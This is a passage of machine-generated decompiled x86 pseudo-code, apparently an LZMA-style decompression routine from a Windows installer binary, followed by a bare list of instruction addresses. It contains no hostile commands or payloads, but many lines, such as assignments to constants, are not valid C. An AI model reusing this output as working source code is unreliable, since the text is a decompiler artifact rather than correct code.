							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                0x00000000
                                                0x00406c71
                                                0x00406c71
                                                0x00406c75
                                                0x00406d2c
                                                0x00406d2f
                                                0x00406d3b
                                                0x00406c1c
                                                0x00406c1c
                                                0x00406c1f
                                                0x00406f91
                                                0x00406f91
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00407007
                                                0x00407007
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe2
                                                0x00406fe6
                                                0x00407195
                                                0x00000000
                                                0x00407195
                                                0x00406ff2
                                                0x00406ff9
                                                0x00407001
                                                0x00407004
                                                0x00000000
                                                0x00407004
                                                0x00406c7b
                                                0x00406c7f
                                                0x004071c0
                                                0x004071c0
                                                0x004071c3
                                                0x004071c7
                                                0x004071c7
                                                0x00406c85
                                                0x00406c8b
                                                0x00406c8e
                                                0x00406c92
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x004071ab
                                                0x004071b3
